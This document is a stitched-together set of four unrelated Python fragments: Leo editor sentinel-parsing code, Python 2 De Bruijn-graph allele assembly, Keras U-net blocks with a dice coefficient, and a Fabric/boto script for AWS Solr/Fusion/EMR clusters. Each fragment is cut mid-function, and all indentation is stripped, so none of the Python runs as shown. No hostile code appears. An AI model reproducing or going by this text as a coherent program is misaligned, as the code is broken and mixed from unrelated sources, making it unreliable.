g.printObj([v4.h for v4 in v.parents])
#@-<< define dump_v >>
i = 0 # To keep pylint happy.
for i, line in enumerate(lines[start:]):
# Order matters.
#@+<< 1. common code for all lines >>
#@+node:ekr.20180602103135.10: *4* << 1. common code for all lines >>
if verbatim:
# We are in raw mode, or other special situation.
# Previous line was verbatim sentinel. Append this line as it is.
if afterref:
afterref = False
if body: # a List of lines.
body[-1] = body[-1].rstrip() + line
else:
body = [line]
verbatim = False
elif in_raw:
m = end_raw_pat.match(line)
if m:
in_raw = False
verbatim = False
else:
body.append(line)
# Continue verbatim/raw mode.
else:
body.append(line)
verbatim = False
continue
if line == verbline: # <delim>@verbatim.
verbatim = True
continue
#
# Strip the line only once.
strip_line = line.strip()
#
# Undo the cweb hack.
if is_cweb and line.startswith(sentinel):
line = line[:len(sentinel)] + line[len(sentinel):].replace('@@', '@')
# Adjust indentation.
if indent and line[:indent].isspace() and len(line) > indent:
line = line[indent:]
#@-<< 1. common code for all lines >>
#@+<< 2. short-circuit later tests >>
#@+node:ekr.20180602103135.12: *4* << 2. short-circuit later tests >>
# This is valid because all following sections are either:
# 1. guarded by 'if in_doc' or
# 2. guarded by a pattern that matches the start of the sentinel.
#
if not in_doc and not strip_line.startswith(sentinel):
# lstrip() is faster than using a regex!
body.append(line)
continue
#@-<< 2. short-circuit later tests >>
#@+<< 3. handle @others >>
#@+node:ekr.20180602103135.14: *4* << 3. handle @others >>
m = others_pat.match(line)
if m:
in_doc = False
if m.group(2) == '+': # opening sentinel
body.append('%s@others%s\n' % (m.group(1), m.group(3) or ''))
stack.append((gnx, indent, body))
indent += m.end(1) # adjust current indentation
else: # closing sentinel.
# m.group(2) is '-' because the pattern matched.
gnx, indent, body = stack.pop()
continue
#@-<< 3. handle @others >>
#@afterref
# clears in_doc
#@+<< 4. handle section refs >>
#@+node:ekr.20180602103135.18: *4* << 4. handle section refs >>
m = ref_pat.match(line)
if m:
in_doc = False
if m.group(2) == '+':
# open sentinel.
body.append(m.group(1) + g.angleBrackets(m.group(3)) + '\n')
stack.append((gnx, indent, body))
indent += m.end(1)
else:
# close sentinel.
# m.group(2) is '-' because the pattern matched.
gnx, indent, body = stack.pop()
continue
#@-<< 4. handle section refs >>
#@afterref
# clears in_doc.
# Order doesn't matter, but match more common sentinels first.
#@+<< handle node_start >>
#@+node:ekr.20180602103135.19: *4* << handle node_start >>
m = node_start_pat.match(line)
if m:
in_doc, in_raw = False, False
gnx, head = m.group(2), m.group(5)
level = int(m.group(3)) if m.group(3) else 1 + len(m.group(4))
# m.group(3) is the level number, m.group(4) is the number of stars.
v = gnx2vnode.get(gnx)
#
# Case 1: The root @file node. Don't change the headline.
if not root_seen:
# Fix #1064: The node represents the root, regardless of the gnx!
root_seen = True
clone_v = None
gnx2body[gnx] = body = []
if not v:
# Fix #1064.
v = root_v
# This message is annoying when using git-diff.
# if gnx != root_gnx:
# g.es_print("using gnx from external file: %s" % | |
range(len(vertice_count) - 2):
v = vertice_with_id[v][1]
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
else:
for v in range(len(vertices)):
assert len(vertices) >= 2
relative_avg = (sum(vertice_count) - vertice_count[v]) / float(len(vertice_count) - 1)
if len(vertices) == 2:
# Eliminate reads that have conflicts with other reads due to a deletion
if vertice_count[v] * 2 < relative_avg:
nt, kmer, _, num_ids = vertices[1-v]
if nt == 'D':
num_id = num_ids[0]
read_id = num_to_id[num_id]
left, seq = pos - self.nodes[read_id].left, node_seq[read_id]
seq_right = ''.join(seq[left+k:])
seq_right = seq_right.replace('D', '')
success = True
for num_id2 in vertices[v][3]:
read_id2 = num_to_id[num_id2]
left2, seq2 = pos-self.nodes[read_id2].left, node_seq[read_id2]
seq2_right = ''.join(seq2[left2+k:])
if seq_right.find(seq2_right) != 0:
success = False
break
if success:
delete_ids |= set(vertices[v][3])
# DK - working on ...
if DRB1_debug:
if vertice_count[v] * 8 < relative_avg:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
elif vertice_count[v] * 8 < avg_kmers:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
else:
if vertice_count[v] * 3 < relative_avg:
num_ids = vertices[v][3]
delete_ids |= set(num_ids)
if debug_msg:
print >> sys.stderr, v, "is removed with", num_ids
if debug_msg:
print >> sys.stderr
print >> sys.stderr
if len(delete_ids) == 0:
if try_hard:
break
else:
try_hard = True
for num_id in delete_ids:
read_id = num_to_id[num_id]
del self.nodes[read_id]
# Print De Bruijn graph
# """
# for i in range(len(debruijn)):
for i in range(len(debruijn)):
curr_vertices = debruijn[i]
if len(curr_vertices) == 0:
continue
consensus_seq = [{} for j in range(k)]
for v in range(len(curr_vertices)):
nt, k_m1_mer = curr_vertices[v][:2]
kmer = k_m1_mer + nt
assert len(kmer) == k
for j in range(k):
nt = kmer[j]
if nt not in consensus_seq[j]:
consensus_seq[j][nt] = 1
else:
consensus_seq[j][nt] += 1
if print_msg: print >> sys.stderr, i
for v in range(len(curr_vertices)):
nt, k_m1_mer, predecessors, num_ids = curr_vertices[v]
kmer = k_m1_mer + nt
kmer_seq = ""
for j in range(k):
nt = kmer[j]
if len(consensus_seq[j]) >= 2:
kmer_seq += "\033[94m"
kmer_seq += nt
if len(consensus_seq[j]) >= 2:
kmer_seq += "\033[00m"
if print_msg: print >> sys.stderr, "\t%d:" % v, kmer_seq, len(num_ids), predecessors, num_ids
# """
# Generate compressed nodes
paths = []
path_queue, done = deque(), set()
for i in range(len(debruijn)):
if len(debruijn[i]) == 0:
continue
for i2 in range(len(debruijn[i])):
path_queue.append("%d-%d" % (i, i2))
break
while len(path_queue) > 0:
i_str = path_queue.popleft()
if i_str in done:
continue
i, i2 = i_str.split('-')
i, i2 = int(i), int(i2)
num_ids = debruijn[i][i2][3]
j = i + 1
while j < len(debruijn):
merge, branch = len(debruijn[j-1]) > len(debruijn[j]), len(debruijn[j-1]) < len(debruijn[j])
new_i2 = -1
tmp_num_ids = []
found = False
for j2 in range(len(debruijn[j])):
_, _, predecessors, add_read_ids = debruijn[j][j2]
if len(predecessors) == 0:
branch = True
path_queue.append("%d-%d" % (j, j2))
elif i2 in predecessors:
found = True
# merge into one node
if len(predecessors) > 1:
merge = True
if new_i2 >= 0:
branch = True
new_i2 = j2
tmp_num_ids += add_read_ids
if merge or branch:
for j2 in range(len(debruijn[j])):
_, _, predecessors, add_num_ids = debruijn[j][j2]
if i2 in predecessors:
path_queue.append("%d-%d" % (j, j2))
break
if not found:
break
num_ids += tmp_num_ids
i2 = new_i2
j += 1
done.add(i_str)
num_ids = set(num_ids)
paths.append([i, j, num_ids])
if j < len(debruijn) and len(debruijn[j]) == 0:
j += 1
while j < len(debruijn) and len(debruijn[j]) == 0:
j += 1
if j < len(debruijn):
for j2 in range(len(debruijn[j])):
path_queue.append("%d-%d" % (j, j2))
def get_mate_num_ids(num_ids):
mate_num_ids = set()
for num_id in num_ids:
read_id = num_to_id[num_id]
mate_read_id = get_mate_node_id(read_id)
if mate_read_id in id_to_num:
mate_num_id = id_to_num[mate_read_id]
mate_num_ids.add(mate_num_id)
return mate_num_ids
# Generate a compressed assembly graph
def path_cmp(a, b):
if a[0] != b[0]:
return a[0] - b[0]
else:
return a[1] - b[1]
paths = sorted(paths, cmp=path_cmp)
# DK - debugging purposes
for p in range(len(paths)):
if print_msg: print >> sys.stderr, "path:", p, paths[p]
excl_num_ids = set() # exclusive num ids
equiv_list = []
p = 0
while p < len(paths):
left, right, num_ids = paths[p]
p2 = p + 1
while p2 < len(paths):
next_left, next_right, next_num_ids = paths[p2]
if next_left >= right:
break
p2 += 1
equiv_list.append([])
for i in range(p, p2):
left, right, num_ids = paths[i]
equiv_list[-1].append([[i], num_ids, num_ids | get_mate_num_ids(num_ids), []])
if p + 1 < p2:
assert p + 2 == p2
excl_num_ids |= num_ids
p = p2
new_equiv_list = []
for classes in equiv_list:
if len(classes) > 1:
new_equiv_list.append(classes)
continue
assert len(classes) == 1
num_ids = classes[0][1] - excl_num_ids
if len(num_ids) <= 0:
continue
classes[0][1] = num_ids
classes[0][2] = num_ids | get_mate_num_ids(num_ids)
new_equiv_list.append(classes)
equiv_list = new_equiv_list
known_alleles = False
while True:
# DK - debugging purposes
# """
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
ids, num_ids, all_ids, alleles = classes[j]
if print_msg: print >> sys.stderr, i, j, ids, len(num_ids), sorted(list(num_ids))[:20], alleles
if print_msg: print >> sys.stderr
# """
if known_alleles:
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
num_ids = sorted(list(classes[j][1]))
node_id = "(%d-%d)%s" % (i, j, num_to_id[num_ids[0]])
node = self.nodes2[node_id]
node_vars = node.get_var_ids()
max_alleles, max_common = set(), -sys.maxint
for anode in self.predicted_allele_nodes.values():
allele_vars = anode.get_var_ids(node.left, node.right)
tmp_common = len(set(node_vars) & set(allele_vars)) - len(set(node_vars) | set(allele_vars))
if tmp_common > max_common:
max_common = tmp_common
max_alleles = set([anode.id])
elif tmp_common == max_common:
max_alleles.add(anode.id)
classes[j][3] = max_alleles
best_common_mat, best_stat, best_i, best_i2 = [], -sys.maxint, -1, -1
for i in range(len(equiv_list) - 1):
classes = equiv_list[i]
for i2 in range(i + 1, len(equiv_list)):
classes2 = equiv_list[i2]
common_mat = []
for j in range(len(classes)):
common_mat.append([])
if known_alleles:
ids = classes[j][3]
else:
ids = classes[j][2]
for j2 in range(len(classes2)):
if known_alleles:
ids2 = classes2[j2][3]
else:
ids2 = classes2[j2][2]
common_mat[-1].append(len(ids & ids2))
# Calculate stat
common_stat = 0
if len(classes) == 1 or len(classes2) == 1:
for row in common_mat:
common_stat += sum(row)
else:
for row in common_mat:
sorted_row = sorted(row, reverse=True)
common_stat += (sorted_row[0] - sorted_row[1])
if common_mat[0][0] + common_mat[1][1] == \
common_mat[1][0] + common_mat[0][1]:
common_stat = -1
if common_stat > best_stat:
best_common_mat, best_stat, best_i, best_i2 = common_mat, common_stat, i, i2
# DK - debugging purposes
# """
if print_msg:
print >> sys.stderr, "best:", best_i, best_i2, best_stat, best_common_mat
print >> sys.stderr
print >> sys.stderr
# """
if known_alleles and best_stat < 0:
self.remove_nodes(self.nodes2)
break
if best_stat < 0:
known_alleles = True
new_nodes = {}
for i in range(len(equiv_list)):
classes = equiv_list[i]
for j in range(len(classes)):
ids, num_ids, all_ids, alleles = classes[j]
num_ids = sorted(list(num_ids))
# DK - debugging purposes
if print_msg: print >> sys.stderr, i, j, num_ids
assert len(num_ids) > 0
read_id = num_to_id[num_ids[0]]
node = deepcopy(self.nodes[read_id])
for num_id2 in num_ids[1:]:
read_id2 = num_to_id[num_id2]
node2 = self.nodes[read_id2]
node.combine_with(node2)
new_read_id = "(%d-%d)%s" % (i, j, read_id)
node.id = new_read_id
assert new_read_id not in new_nodes
new_nodes[new_read_id] = node
self.nodes = new_nodes
self.nodes2 = deepcopy(self.nodes)
self.remove_nodes(self.nodes)
continue
# DK - for the moment
mat = best_common_mat
classes, classes2 = equiv_list[best_i], equiv_list[best_i2]
# Filter vertices further if necessary
def del_row(classes, mat, r):
return classes[:r] + classes[r+1:], mat[:r] + mat[r+1:]
def del_col(classes, mat, c):
new_mat = []
for row in mat:
row = row[:c] + row[c+1:]
new_mat.append(row)
return classes[:c] + classes[c+1:], new_mat
assert len(classes) <= 2 and len(classes2) <= 2
if len(classes) == 2 and len(classes2) == 2:
# Check row
num_ids1, num_ids2 = len(classes[0][1]), len(classes[1][1])
if num_ids1 * 6 < num_ids2 or num_ids2 * 6 < num_ids1:
row_sum1, row_sum2 = sum(mat[0]), sum(mat[1])
if row_sum1 > max(2, row_sum2 * 6):
classes, mat = del_row(classes, mat, 1)
classes[0][1] -= excl_num_ids
elif row_sum2 > max(2, row_sum1 * 6):
classes, mat = del_row(classes, mat, 0)
classes[0][1] -= excl_num_ids
# Check column
if len(classes) == 2:
num_ids1, num_ids2 = len(classes2[0][1]), len(classes2[1][1])
if num_ids1 * 6 < num_ids2 or num_ids2 * 6 < num_ids1:
col_sum1, col_sum2 = mat[0][0] + mat[1][0], mat[0][1] + mat[1][1]
if col_sum1 > max(2, col_sum2 | |
equal-sized masks.
Used for testing on artificially generated np.arrays
Dice Coefficient: https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
Need smooth, because otherwise 2 empty (all-zero) masks would cause a division by zero instead of giving 1 as an output.
:param mask_1: first mask
:param mask_2: second mask
:param smooth: Smoothing parameter for dice coefficient
:return: Smoothened dice coefficient between two equal-sized masks
"""
tr = mask_1.flatten()
pr = mask_2.flatten()
return (2. * np.sum(tr * pr) + smooth) / (np.sum(tr) + np.sum(pr) + smooth)
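# --- Worked example (sketch) ---------------------------------------------------
# With the smoothing term disabled, two binary masks that share one of their
# two positive pixels give dice = 2*1 / (2+1) = 2/3. The keyword name `smooth`
# is assumed from the docstring above.
def _demo_np_dice_coef():
    a = np.array([1., 1., 0.])
    b = np.array([1., 0., 0.])
    assert np.isclose(np_dice_coef(a, b, smooth=0.0), 2. / 3.)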
# ----------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
a = np.random.random((420, 100))
b = np.random.random((420, 100))
res = np_dice_coef(a, b)
print(res)
########################################################################################################################
# ======================================================================================================================
# u_model_blocks
# ======================================================================================================================
########################################################################################################################
# needed for u_model
# standard-module imports
from keras.layers import add, concatenate, Conv2D, MaxPooling2D
from keras.layers import BatchNormalization, Lambda
from keras.layers.advanced_activations import ELU, LeakyReLU
# ======================================================================================================================
# utility blocks needed for internal performance
# ======================================================================================================================
def NConv2D(filters, kernel_size, strides=(1, 1), padding='valid', dilation_rate=1,
activation=None, kernel_initializer='glorot_uniform'):
"""Create a (Normalized Conv2D followed by a chosen activation) function
Conv2D -> BatchNormalization -> activation()
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution)
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param strides: An integer or tuple/list of 2 integers, specifying the strides of the convolution along the height
and width. Can be a single integer to specify the same value for all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying any dilation_rate value != 1.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param dilation_rate: an integer or tuple/list of a single integer, specifying the dilation rate
to use for dilated convolution. Currently, specifying any dilation_rate value != 1
is incompatible with specifying any strides value != 1
:param activation: string, one of 'elu' or 'relu' or None (case-sensitive),
specifies activation function to be performed after BatchNormalization
:param kernel_initializer: Initializer for the kernel weights matrix (see initializers in keras documentation)
:return: a function, combined of 2D Convolution, followed by BatchNormalization across filters,
and specified activation in that order
"""
assert activation in ['relu', 'elu', None]
# actv is a function, not a string, like activation
actv = activation == 'relu' and (lambda: LeakyReLU(0.0)) or activation == 'elu' and (lambda: ELU(1.0)) or None
def f(_input):
conv = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding=padding,
dilation_rate=dilation_rate, kernel_initializer=kernel_initializer)(_input)
norm = BatchNormalization(axis=3)(conv)
return actv()(norm)
return f
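# --- Illustrative usage sketch -------------------------------------------------
# A minimal sketch showing how NConv2D is applied like a Conv2D layer factory:
# it returns a function that maps a tensor through Conv2D -> BatchNormalization
# -> activation. The input shape below is an assumption for illustration.
def _demo_nconv2d():
    from keras.layers import Input  # local import keeps the sketch self-contained
    inputs = Input((64, 80, 1))
    return NConv2D(filters=32, kernel_size=(3, 3), padding='same', activation='elu')(inputs)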
# needed for rblock (residual block)
def _shortcut(_input, residual):
stride_width = _input._keras_shape[1] / residual._keras_shape[1]
stride_height = _input._keras_shape[2] / residual._keras_shape[2]
equal_channels = residual._keras_shape[3] == _input._keras_shape[3]
shortcut = _input
# 1 X 1 conv if shape is different. Else identity.
if stride_width > 1 or stride_height > 1 or not equal_channels:
shortcut = Conv2D(filters=residual._keras_shape[3], kernel_size=(1, 1),
strides=(stride_width, stride_height),
kernel_initializer="he_normal", padding="valid")(_input)
return add([shortcut, residual])
def rblock(inputs, filters, kernel_size, padding='valid', activation=None, scale=0.1):
"""Create a scaled Residual block connecting the down-path and the up-path of the u-net architecture
Activations are scaled by a constant to prevent the network from dying. Usually is set between 0.1 and 0.3. See:
https://towardsdatascience.com/a-simple-guide-to-the-versions-of-the-inception-network-7fc52b863202
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output convolution filters)
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, one of 'elu' or 'relu' or None (case-sensitive),
specifies activation function to use everywhere in the block
:param scale: scaling factor preventing the network from dying out
:return: 4D tensor (samples, rows, cols, channels) output of a residual block, given inputs
"""
assert activation in ['relu', 'elu', None]
# actv is a function, not a string, like activation
actv = activation == 'relu' and (lambda: LeakyReLU(0.0)) or activation == 'elu' and (lambda: ELU(1.0)) or None
residual = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding)(inputs)
residual = BatchNormalization(axis=3)(residual)
residual = Lambda(lambda x: x * scale)(residual)
res = _shortcut(inputs, residual)
return actv()(res)
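# --- Illustrative usage sketch -------------------------------------------------
# A sketch of the scaled residual block applied to a feature map. With
# padding='same' and matching channel counts, _shortcut reduces to an identity
# connection. Shapes and the scale value are illustrative assumptions.
def _demo_rblock():
    from keras.layers import Input
    inputs = Input((64, 80, 32))
    return rblock(inputs, filters=32, kernel_size=(3, 3), padding='same',
                  activation='relu', scale=0.1)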
# ======================================================================================================================
# information blocks
# ======================================================================================================================
def convolution_block(inputs, filters, kernel_size=(3, 3), padding='valid', activation=None,
version='normalized', pars={}, allowed_pars={}):
"""Create a version of a convolution block.
Versions: with and without batch-normalization after convolutions.
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution).
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, specifies activation function to use everywhere in the block
:param version: version of the convolution block, one of 'not_normalized', 'normalized' (case sensitive)
:param pars: dictionary of parameters passed to u-net, determines the version, if this type of block is chosen
:param allowed_pars: dictionary of all allowed to be passed to u-net parameters
:return: 4D tensor (samples, rows, cols, channels) output of a convolution block, given inputs
"""
assert activation in ['relu', 'elu', None]
# checking that the allowed version names did not change in ALLOWED_PARS
if allowed_pars != {}:
assert allowed_pars.get('information_block').get('convolution').get('simple') == ['not_normalized',
'normalized']
# keep version argument if need to use without PARS
assert version in ['not_normalized', 'normalized']
# setting the version from pars
if pars.get('information_block').get('convolution').get('simple') is not None:
version = pars.get('information_block').get('convolution').get('simple')
if version == 'normalized':
conv1 = NConv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(inputs)
return NConv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(conv1)
else:
conv1 = Conv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(inputs)
return Conv2D(filters=filters, kernel_size=kernel_size, activation=activation, padding=padding)(conv1)
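# --- Illustrative usage sketch -------------------------------------------------
# Selecting the convolution-block version through `pars`, mirroring the lookup
# performed above. The nested pars dictionary here is a minimal assumed
# structure, not the full parameter set used by the u-net builder.
def _demo_convolution_block():
    from keras.layers import Input
    inputs = Input((64, 80, 1))
    pars = {'information_block': {'convolution': {'simple': 'normalized'}}}
    return convolution_block(inputs, filters=32, padding='same', activation='elu', pars=pars)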
def dilated_convolution_block(inputs, filters, kernel_size=(3, 3), padding='valid', activation=None,
version='normalized', pars={}, allowed_pars={}):
"""Create a version of a dilated-convolution block.
Versions: with and without batch-normalization after dilated convolutions.
See more about dilated convolutions:
https://towardsdatascience.com/review-dilated-convolution-semantic-segmentation-9d5a5bd768f5
:param inputs: Input 4D tensor (samples, rows, cols, channels)
:param filters: Integer, the dimensionality of the output space (i.e. the number of output filters in the
convolution).
:param kernel_size: An integer or tuple/list of 2 integers, specifying the height and width of the 2D convolution
window. Can be a single integer to specify the same value for all spatial dimensions.
:param padding: one of 'valid' or 'same' (case-insensitive), 'valid' by default to have the same as Conv2D
:param activation: string, specifies activation function to use everywhere in the block
:param version: version of the dilated-convolution block, one of 'not_normalized', 'normalized' (case sensitive)
:param pars: dictionary of parameters passed to u-net, determines the version, if this type of block is chosen
:param allowed_pars: dictionary of all allowed to be passed to u-net parameters
:return: 4D tensor (samples, rows, cols, channels) output of a dilated-convolution block, given inputs
"""
assert activation in ['relu', 'elu', None]
# checking that the allowed version names did not change in ALLOWED_PARS
if allowed_pars != {}:
assert allowed_pars.get('information_block').get('convolution').get('dilated') == ['not_normalized',
'normalized']
# keep version argument if need to use without PARS
assert version in ['not_normalized', 'normalized']
# setting the version from pars
if pars.get('information_block').get('convolution').get('dilated') is not None:
version = pars.get('information_block').get('convolution').get('dilated')
if version == 'normalized':
conv1 = NConv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=2, activation=activation)(inputs)
return NConv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=1, activation=activation)(conv1)
else:
conv1 = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=2, activation=activation)(inputs)
return Conv2D(filters=filters, kernel_size=kernel_size, padding=padding,
dilation_rate=1, activation=activation)(conv1)
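# --- Illustrative usage sketch -------------------------------------------------
# Same idea for the dilated block: the version is read from
# pars['information_block']['convolution']['dilated'] (minimal assumed structure).
def _demo_dilated_convolution_block():
    from keras.layers import Input
    inputs = Input((64, 80, 1))
    pars = {'information_block': {'convolution': {'dilated': 'not_normalized'}}}
    return dilated_convolution_block(inputs, filters=32, padding='same', activation='elu', pars=pars)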
def inception_block_v1(inputs, filters, activation=None, version='b', pars={}, allowed_pars={}):
"""Create a version of v1 inception block described in:
https://towardsdatascience.com/a-simple-guide-to-the-versions-of-the-inception-network-7fc52b863202
Create an inception block described in v1, sections 'a' (for naive version), or 'b' (with dimension reduction)
Each version has 4 verticals in their structure. See the link above.
For all versions, verticals 1 and 2 of the block start with 2D convolution, which:
reduces the number of input filters to next convolutions (to make computation cheaper)
uses (1, 1) kernels, no Normalization
is NOT normalized
is followed by | |
found in Solr!')
earliestDoc = results.docs[0][timestampField]
earliestTime = dateutil.parser.parse(earliestDoc)
results = solr.search(timestampField+':[* TO *]', **{'sort':timestampField+' DESC'})
latestTime = dateutil.parser.parse(results.docs[0][timestampField])
duration = (latestTime-earliestTime).total_seconds()
tp = 0
if duration > 0:
tp = results.hits / duration
return tp
def _wait_for_emr_step_to_finish(emr, job_flow_id, stepId, stepName, maxWaitSecs=1800):
isDone = False
waitTime = 0
startedAt = time.time()
maxWait = int(maxWaitSecs)
loops = 0
stepState = 'UNKNOWN'
_status('Waiting up to %d seconds to see step %s complete for job flow %s' % (maxWait, stepName, job_flow_id))
while isDone is False and waitTime < maxWait:
stepState = emr.describe_step(job_flow_id, stepId).status.state
if stepState != 'RUNNING' and stepState != 'STARTING' and stepState != 'PENDING':
isDone = True
break
time.sleep(30)
waitTime = round(time.time() - startedAt)
if loops > 0 and loops % 2 == 0:
_status('Waited %d seconds so far for step %s to complete ... last state was %s' % (waitTime, stepName, stepState))
loops += 1
if isDone:
_info('Step %s %s in ~%d seconds' % (stepName, stepState, waitTime))
else:
_error('Step %s failed to complete within %d seconds!' % (stepName, maxWait))
return stepState
def _wait_to_see_fusion_proxy_up(cluster, host, maxWaitSecs=30):
waitTime = 0
startedAt = time.time()
isRunning = False
maxWait = int(maxWaitSecs)
hostAndPort = host+':8764'
while isRunning is False and waitTime < maxWait:
isRunning = _is_fusion_proxy_up(hostAndPort)
if isRunning:
break
if isRunning is False:
time.sleep(10)
waitTime = round(time.time() - startedAt)
_status('Waited %d seconds so far to verify Fusion proxy is running on %s.' % (waitTime, hostAndPort))
return isRunning
def _is_fusion_proxy_up(hostAndPort):
isProxyUp = False
try:
urllib2.urlopen('http://%s/api' % hostAndPort)
_info('Fusion proxy at ' + hostAndPort + ' is online.')
isProxyUp = True
except urllib2.HTTPError as e:
print(str(e))
isProxyUp = False
except:
print(str(sys.exc_info()[0]))
isProxyUp = False
return isProxyUp
def _wait_to_see_fusion_api_up(cluster, apiHost, maxWait):
waitTime = 0
startedAt = time.time()
isRunning = False
if maxWait > 10:
_status('Will wait up to '+str(maxWait)+' secs to see Fusion API service up on host: '+apiHost)
fusionVers = _env(cluster, 'fusion_vers', defaultValue='3.1.0')
path = 'system/ping'
while isRunning is False and waitTime < int(maxWait):
isRunning = False
try:
statusResp = _fusion_api(apiHost, path)
# if we get here, api is responding ...
if statusResp == "pong":
isRunning = True
else:
_error('ping '+apiHost+' returned: '+statusResp)
except:
# make it JSON
statusResp = '{ "error": "'+str(sys.exc_info()[0])+'" }'
_warn('ping '+apiHost+' failed due to '+statusResp+'! Check status of Fusion and retry')
if isRunning:
break
if isRunning is False and int(maxWait) >= 15:
time.sleep(15)
waitTime = round(time.time() - startedAt)
_status('Waited %d seconds so far to verify Fusion API is running on %s.' % (waitTime, apiHost))
else:
_status('Fusion API service is not running due to: '+statusResp)
break
return isRunning
def _lookup_emr_job_flow_id(emrApi, emrCluster):
sstk_cfg = _get_config()
job_flow_id = None
if sstk_cfg.has_key('emr'):
emr = sstk_cfg['emr']
if emr.has_key(emrCluster):
clust = emr[emrCluster]
if clust.has_key('job_flow_id'):
job_flow_id = clust['job_flow_id']
if job_flow_id is None:
list = emrApi.list_clusters()
if list is not None:
for csl in list.clusters:
if csl.name == emrCluster:
job_flow_id = csl.id
if job_flow_id is not None:
if sstk_cfg.has_key('emr') is False:
sstk_cfg['emr'] = {}
if sstk_cfg['emr'].has_key(emrCluster) is False:
sstk_cfg['emr'][emrCluster] = {}
sstk_cfg['emr'][emrCluster]['job_flow_id'] = job_flow_id
_save_config()
if job_flow_id is None:
_fatal('Cannot find job flow ID for EMR cluster named '+emrCluster)
return job_flow_id
def _resolve_vpc_subnetid(cluster,az):
vpcSubnetId = _env(cluster, "vpc_subnetid", "")
if vpcSubnetId == "":
vpcSubnetId = None #reset
_status('No VPC subnet ID configured ... looking up best available option in the '+az+' availability zone ...')
vpc = boto.vpc.connect_to_region(az[0:len(az)-1])
for sn in vpc.get_all_subnets(filters={"availabilityZone":[az]}):
vpcSubnetId = sn.id
_status('Found '+vpcSubnetId+' in the '+az+' availability zone')
break
if vpcSubnetId is None:
_fatal('Cannot determine VPC subnet ID for launching EC2 instances in '+az+' Please set the vpc_subnetid property in your ~/.sstk file.')
return vpcSubnetId
def _defaultvpc_exists(region='us-west-2'):
vpc = boto.vpc.connect_to_region(region)
vpc.get_all_vpcs()
ret = False
for i in vpc.get_all_vpcs():
print(str(i))
if i.is_default:
ret = True
break
_status("Default VPC exists:" + str(ret))
return ret
def _get_collection_state(cluster,collection):
cloud = _provider_api(cluster)
hosts = _cluster_hosts(cloud, cluster)
zkhost = _read_cloud_env(cluster)["ZK_HOST"]
fusionHome = _env(cluster, 'fusion_home')
collection_state_znode_path = "/collections/{}/state.json".format(collection)
output_path = "{}_state.json".format(collection)
script_command = "{}/scripts/zkImportExport.sh -z {} -cmd export -path {} -e utf-8 -f {}"\
.format(fusionHome, zkhost, collection_state_znode_path, output_path)
state = None
with settings(host_string=hosts[0]), hide('output', 'running'):
# _info("Getting collection state using command {} on host {}".format(script_command, hosts[0]))
run("rm -rf {}".format(output_path))
run(script_command)
output = run("cat {}".format(output_path))
out_json = json.loads(output)
if "response" in out_json:
if "data" in out_json["response"]:
state = json.loads(out_json["response"]["data"])
if state is None:
_fatal("Failed to get Solr state from import export script. Output: " + out_json)
if state:
shards_state = state[collection]["shards"]
host_shard_mapping = {}
for shard in shards_state:
replicas = shards_state[shard]["replicas"]
for core in replicas:
core_status = replicas[core]
if "leader" in core_status and core_status["leader"] == "true":
node_name = core_status["node_name"][:-10]
leader_state = {"node": node_name, "core": core_status["core"]}
host_shard_mapping[shard] = leader_state
return host_shard_mapping
else:
_fatal("Failed to get Solr state from import export script using command '" + script_command + "'")
def attach_ebs(cluster,n=None,size=50,device='sdy',volume_type=None,iops=None):
"""
Attaches a new EBS volume to an instance in an existing cluster.
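Example (illustrative values): fab attach_ebs:cloud1,n=0,size=100,device=sdy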
"""
ec2 = _provider_api(cluster)
ebsSizeInGb = int(size)
hosts = _cluster_hosts(ec2, cluster)
if n is not None:
onlyOne = []
onlyOne.append(hosts[int(n)])
hosts = onlyOne
for instanceHost in hosts:
# copy the tags over from the instance to the ebs vol
tagsOnInstance = {}
instanceId = None
az = None
byTag = ec2.get_all_instances(filters={'tag:' + CLUSTER_TAG:cluster})
for rsrv in byTag:
for inst in rsrv.instances:
if (inst.public_dns_name == instanceHost or inst.private_ip_address == instanceHost):
tagsOnInstance = inst.__dict__['tags']
instanceId = inst.id
az = inst.placement
break
if instanceId is None or az is None:
_fatal("Can't find instance ID / availability zone for instance "+instanceHost+" in cluster: "+cluster)
vol = ec2.create_volume(ebsSizeInGb, az, volume_type=volume_type, iops=iops)
_info('Created new EBS volume '+vol.id+' in AZ '+az)
time.sleep(5)
volStatus = "unknown"
maxTime = 180
totalTime = 0
while volStatus != "available" and totalTime < maxTime:
curr_vol = ec2.get_all_volumes([vol.id])[0]
volStatus = curr_vol.status
_status('New EBS volume for '+instanceId+' in '+curr_vol.zone+' is '+volStatus)
if volStatus != "available":
time.sleep(10)
totalTime += 10
if volStatus != "available":
